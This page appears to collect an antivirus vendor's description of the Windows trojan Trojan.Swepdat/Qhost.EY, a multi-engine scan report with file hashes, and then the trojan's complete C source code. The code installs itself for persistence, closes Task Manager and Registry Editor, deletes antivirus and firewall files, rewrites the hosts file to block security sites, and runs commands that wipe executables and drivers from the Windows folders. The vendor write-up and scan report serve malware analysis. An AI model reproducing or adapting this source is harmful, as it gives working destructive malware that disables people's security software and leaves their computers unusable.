source - trojan.win32.qhost.ey
TRANSCRIPT
Trojan.SwepdatRisk Level 1: Very Low
Printer Friendly Page
SUMMARYTECHNICAL DETAILSREMOVAL
Discovered: December 15, 2005Updated: February 13, 2007 12:50:03 PMType: Trojan HorseSystems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, WindowsServer 2003, Windows XP
When Trojan.Swepdat is executed, it performs the following actions:
1. Copies itself as %System%\WUpdates.exe.
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System(Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (WindowsXP).
2. Adds the value:
"WUpdates" = "%System%\WUpdates.exe"
to the registry subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
so that it runs every time Windows starts.
3. Attempts to rename the following files:
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe toC:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_C:\WINDOWS\regedit.exe to C:\WINDOWS\regedit.ex_C:\WINDOWS\system32\Restorerstrui\rstrui.exe toC:\WINDOWS\system32\Restorerstrui\rstrui.ex_C:\WINDOWS\system32\wscui.cpl to C:\WINDOWS\system32\wscui.cp_C:\WINDOWS\system32\wupdmgr.exe to C:\WINDOWS\system32\wupdagr.ex_C:\WINDOWS\system32\taskmgr.exe to C:\WINDOWS\system32\taskdae.ex_
4. Attempts to delete the following security-related files from the specific program folder and allsubfolders:
C:\Program Files\McAfee.com\Personal Firewall\*.dllC:\Program Files\McAfee.com\Personal Firewall\data\*.*C:\Program Files\McAfee.com\Personal Firewall\help\*.*C:\Program Files\McAfee.com\VSO\*.dllC:\Program Files\McAfee.com\VSO\*.iniC:\Program Files\McAfee.com\VSO\Res00\*.dll
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
C:\Program Files\McAfee.com\VSO\Dat\4615\*.*C:\Program Files\McAfee.com\*.*C:\Program Files\Norton AntiVirus\*.dllC:\Program Files\Common Files\Symantec Shared\*.exeC:\Program Files\Norton AntiVirus\*.iniC:\Program Files\Norton AntiVirus\*.exeC:\Program Files\Norton AntiVirus\*.infC:\Program Files\Zone Labs\ZoneAlarm\*.exeC:\Program Files\Zone Labs\ZoneAlarm\*.zapC:\Program Files\Zone Labs\ZoneAlarm\*.dllC:\Program Files\Zone Labs\ZoneAlarm\repair\*.dllC:\Program Files\Kaspersky Lab\AVP6\*.exeC:\Program Files\Kaspersky Lab\AVP6\*.dll
5. Adds the following lines to the hosts file to block access to specific Web sites:
0.0.0.0 google.com0.0.0.0 www.hotmail.com0.0.0.0 www.microsoft.com0.0.0.0 microsoft.com0.0.0.0 macafee.com0.0.0.0 www.macafee.com0.0.0.0 download.mcafee.com0.0.0.0 www.download.mcafee.com0.0.0.0 rads.mcafee.com0.0.0.0 us.mcafee.com0.0.0.0 www.networkassociates.com0.0.0.0 networkassociates.com0.0.0.0 update.symantec.com0.0.0.0 updates.symantec.com0.0.0.0 iveupdate.symantec.com0.0.0.0 norton.com0.0.0.0 www.symantec.com0.0.0.0 symantec.com0.0.0.0 www.norton.com0.0.0.0 google.com0.0.0.0 bitdefender.com0.0.0.0 www.viruslist.com0.0.0.0 viruslist.com0.0.0.0 www.virustotal.com0.0.0.0 virustotal.com0.0.0.0 www.kaspersky.com0.0.0.0 kaspersky.com0.0.0.0 kaspersky-labs.com0.0.0.0 www.kaspersky-labs.com0.0.0.0 www.trendmicro.com0.0.0.0 trendmicro.com0.0.0.0 www.pandasoftware.com0.0.0.0 pandasoftware.com0.0.0.0 www.nod32.com0.0.0.0 nod32.com0.0.0.0 yahoo.com0.0.0.0 mail.yahoo.com0.0.0.0 www.grisoft.com0.0.0.0 www.f-secure.com0.0.0.0 f-secure.com
6. Closes windows with the following window titles:
Windows Task ManagerRegistry EditorSystem Configuration UtilityWindows File Protection
7. Displays a message with the following properties:
Title: ErrorMessage: Access Violation at address: 0050666F
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
8. Creates the file C:\windows\system32\exploit.html which is a malicious HTML file that causes a Denialof Service if opened.
9. Attempts to delete the following files from the following folders:
C:\WINDOWS and all subfolders:*.exe*.dll
C:\WINDOWS\System and all subfolders:*.exe*.dll
C:\WINDOWS\System32 and all subfolders:*.exe*.dll
C:\WINDOWS\System32\Restore, if present, and all subfolders:*.*
C:\WINDOWS\System32\DRIVERS, if present, and all subfolders:*.sys
10. Creates the file C:\NError.dmp, which is a harmless text file.
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
File 74014b1000255b1f306e0088a10738001789c1d3.EXE received on 2009.05.23 13:15:04 (UTC)Antivirus Version Last Update ResultAhnLab-V3 5.0.0.2 2009.05.23 -AntiVir 7.9.0.168 2009.05.23 TR/Qhost.EYAntiy-AVL 2.0.3.1 2009.05.22 Trojan/Win32.QhostAuthentium 5.1.2.4 2009.05.22 W32/Heuristic-119!EldoradoAvast 4.8.1335.0 2009.05.22 Win32:KillWin-SAVG 8.5.0.339 2009.05.23 Generic.MAYBitDefender 7.2 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0CAT-QuickHeal 10.00 2009.05.23 Trojan.Qhost.eyClamAV 0.94.1 2009.05.22 Trojan.RorrenComodo 1157 2009.05.08 TrojWare.Win32.Qhosts.EYDrWeb 5.0.0.12182 2009.05.23 Trojan.KillFiles.472eSafe 7.0.17.0 2009.05.21 Win32.Qhost.eyeTrust-Vet 31.6.6519 2009.05.23 -F-Prot 4.4.4.56 2009.05.22 W32/Heuristic-119!EldoradoF-Secure 8.0.14470.0 2009.05.23 Trojan.Win32.Qhost.eyFortinet 3.117.0.0 2009.05.23 W32/Qhost.EY!trGData 19 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0Ikarus T3.1.1.49.0 2009.05.23 Trojan.Win32.QhostK7AntiVirus 7.10.741 2009.05.21 Trojan.Win32.Qhost.eyKaspersky 7.0.0.125 2009.05.23 Trojan.Win32.Qhost.eyMcAfee 5623 2009.05.22 Zap-337McAfee+Artemis 5623 2009.05.22 Zap-337McAfee-GW-Edition 6.7.6 2009.05.23 Trojan.Qhost.EYMicrosoft 1.4701 2009.05.23 TrojanDropper:Win32/LogsnifNOD32 4098 2009.05.22 Win32/Qhosts.EYNorman 2009.05.22 W32/Qhost.BZnProtect 2009.1.8.0 2009.05.23 Trojan/W32.Qhost.12288.DPCTools 4.4.2.0 2009.05.21 Trojan.QhostsPrevx 3.0 2009.05.23 -Rising 21.30.52.00 2009.05.23 Trojan.Qhost.eqSophos 4.42.0 2009.05.23 Troj/Killfile-FSunbelt 3.2.1858.2 2009.05.23 Trojan.SwepdatSymantec 1.4.4.12 2009.05.23 Trojan.SwepdatTheHacker 6.3.4.3.331 2009.05.22 Trojan/Qhost.eyTrendMicro 8.950.0.1092 2009.05.23 -VBA32 3.12.10.5 2009.05.23 Trojan.Win32.Qhost.eyViRobot 2009.5.23.1749 2009.05.23 -VirusBuster 4.6.5.0 2009.05.22 Trojan.Qhost.RW
Additional informationFile size: 12288 bytesMD5 : 35b259a4d83e4d59be351c396fd6b95aSHA1 : e20d0a5f2600162b76a2c89e3a101ce7240fcff8SHA256: 631cb88ed8edacc15ff90dea81ff661adc628d17919e6c138f6c867d5c46035b
/*
*closes Windows Task Manager *closes Registry Editor *closes System Configuration Utility *closes Windows File Protection *BlockSite *Deleting Windows *infected msconfig.exe *infected rstrui.exe *infected wscui.cpl *infected wupdmgr.exe *infected taskmgr.exe *kill files AV&FW
made by ceoby
*/
#include <stdio.h>#include <stdlib.h>#include <windows.h>#include <mmsystem.h>
void hideprocess(){
int i;for(i = 1; i < 25; i++){
HWND program;Sleep (100);program = FindWindow(0, "Windows Task Manager");SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);program = FindWindow(0, "Registry Editor");SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);program = FindWindow(0, "System Configuration Utility");SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);program = FindWindow(0, "Windows File Protection");SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );}
}
char Wn[MAX_PATH];char Mn[MAX_PATH];SOCKET sock;HWND Wnd;char Buffer [1230];int x,y;
int Hkey(){
char system[MAX_PATH];char pathtofile[MAX_PATH];HMODULE GetModH = GetModuleHandle(NULL);GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));GetSystemDirectory(system,sizeof(system));strcat(system,"\\WUpdates.exe");CopyFile(pathtofile,system,FALSE);HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );RegSetValueEx(hKey, "WUpdates",0,REG_SZ,(const unsigned char*)system,sizeof(system));RegCloseKey(hKey);}
void fPaths(){GetSystemDirectory(Wn, sizeof(Wn));GetModuleFileName(0, Mn, sizeof(Mn));strcat(Wn, "\\WUpdates.exe");
}
void inst(){CopyFile(Mn,Wn,0);CopyFile ("WUpdates.exe", "C:\\windows",TRUE);CopyFile ("MicroSuck.exe", "C:\\windows\\system",TRUE);CopyFile ("Svchost32.exe", "C:\\windows\\system32",TRUE);HKEY inst;RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &inst);RegSetValueEx(inst, "Windows Security Updates", 0, REG_SZ, (LPBYTE)Wn, sizeof(Wn));RegCloseKey(inst);
}
void BlockSite(){
FILE *fpl;fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w");fprintf (fpl,"0.0.0.0 google.com");fprintf (fpl," 0.0.0.0 www.hotmail.com");fprintf (fpl," 0.0.0.0 www.microsoft.com");fprintf (fpl," 0.0.0.0 microsoft.com");fprintf (fpl," 0.0.0.0 macafee.com");fprintf (fpl," 0.0.0.0 www.macafee.com");fprintf (fpl," 0.0.0.0 download.mcafee.com");fprintf (fpl," 0.0.0.0 www.download.mcafee.com");fprintf (fpl," 0.0.0.0 rads.mcafee.com");fprintf (fpl," 0.0.0.0 us.mcafee.com");fprintf (fpl," 0.0.0.0 www.networkassociates.com");fprintf (fpl," 0.0.0.0 networkassociates.com");fprintf (fpl," 0.0.0.0 update.symantec.com");fprintf (fpl," 0.0.0.0 updates.symantec.com");fprintf (fpl," 0.0.0.0 iveupdate.symantec.com");fprintf (fpl," 0.0.0.0 norton.com");fprintf (fpl," 0.0.0.0 www.symantec.com");fprintf (fpl," 0.0.0.0 symantec.com");fprintf (fpl," 0.0.0.0 www.norton.com");fprintf (fpl," 0.0.0.0 google.com");fprintf (fpl," 0.0.0.0 bitdefender.com");fprintf (fpl," 0.0.0.0 www.viruslist.com");fprintf (fpl," 0.0.0.0 viruslist.com");fprintf (fpl," 0.0.0.0 www.virustotal.com");fprintf (fpl," 0.0.0.0 virustotal.com");fprintf (fpl," 0.0.0.0 www.kaspersky.com");fprintf (fpl," 0.0.0.0 kaspersky.com");fprintf (fpl," 0.0.0.0 kaspersky-labs.com");fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com");
fprintf (fpl," 0.0.0.0 www.trendmicro.com");fprintf (fpl," 0.0.0.0 trendmicro.com");fprintf (fpl," 0.0.0.0 www.pandasoftware.com");fprintf (fpl," 0.0.0.0 pandasoftware.com");fprintf (fpl," 0.0.0.0 www.nod32.com");fprintf (fpl," 0.0.0.0 nod32.com");fprintf (fpl," 0.0.0.0 yahoo.com");fprintf (fpl," 0.0.0.0 mail.yahoo.com");fprintf (fpl," 0.0.0.0 www.grisoft.com");fprintf (fpl," 0.0.0.0 www.f-secure.com");fprintf (fpl," 0.0.0.0 f-secure.com");fclose(fpl);
}
void DelWin(){system("del C:\\WINDOWS\\*.exe /F /S /Q");system("del C:\\WINDOWS\\*.dll /F /S /Q");system("del C:\\WINDOWS\\System\\*.exe /F /S /Q");system("del C:\\WINDOWS\\System\\*.dll /F /S /Q");system("del C:\\WINDOWS\\System32\\*.exe /F /S /Q");system("del C:\\WINDOWS\\System32\\*.dll /F /S /Q");system("del C:\\WINDOWS\\System32\\Restore\\*.* /F /S /Q");system("del C:\\WINDOWS\\System32\\DRIVERS\\*.sys /F /S /Q");}
void spaceup(){
char i;FILE *Uknown;Uknown = fopen ("C:\\WINDOWS\\System32\\WUpdates.txt","w");for (i=1;i<100;i++);{Sleep (100);fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x00C0000,Bx0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x00000F0,0x0000000,7x0000000,0x00FF000,Ax0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x000E000,0x0000000");fprintf(Uknown,"0x0000000,0D0000000,Bx0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");Sleep (100);fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Nx0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"Ax0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax000F000,0x00CCC00,0x0000C00,0xFFF0000");Sleep (100);fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"3x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");}
}
void Exploit(){FILE *ghp;ghp = fopen ("C:\\windows\\system32\\exploit.html","w");fprintf(ghp, "<html>");
fprintf(ghp, "<script>");fprintf(ghp, "window.onerror=new Function(history.go(0));");fprintf(ghp, "function btf(){btf();}");fprintf(ghp, "btf();");fprintf(ghp, "</script>");fprintf(ghp, "</html>");}
void Anticlean(){
int i;for(i = 1; i < 9999999; i++)
rename("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe","C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.ex_");
Sleep (100);rename("C:\\WINDOWS\\regedit.exe","C:\\WINDOWS\\regedit.ex_");Sleep (100);rename("C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.exe",
"C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.ex_");Sleep (100);rename("C:\\WINDOWS\\system32\\wscui.cpl","C:\\WINDOWS\\system32\\wscui.cp_");Sleep (100);rename("C:\\WINDOWS\\system32\\wupdmgr.exe","C:\\WINDOWS\\system32\\wupdagr.ex_");Sleep (100);rename("C:\\WINDOWS\\system32\\taskmgr.exe","C:\\WINDOWS\\system32\\taskdae.ex_");Sleep (100);MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );
}
void killavfw(){
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q ");system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q ");system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q ");system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q ");system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q");system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q ");system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q ");system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q ");system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q ");system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q ");system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q ");system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q ");system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q ");
}
int main(int argc, char *argv[]){
HWND wndstealth;AllocConsole();
wndstealth=FindWindowA("ConsoleWindowClass",NULL);ShowWindow(wndstealth,0);
Hkey();Anticlean();killavfw();BlockSite();hideprocess();Exploit();DelWin();
FILE *fp;fp = fopen ("c:\\NError.dmp","w");{fprintf(fp,"%s","Stop: 0x0000000A (0xFFFFFFFC,0x00000002,0x00000000,0x804DC42A)");fclose(fp);}}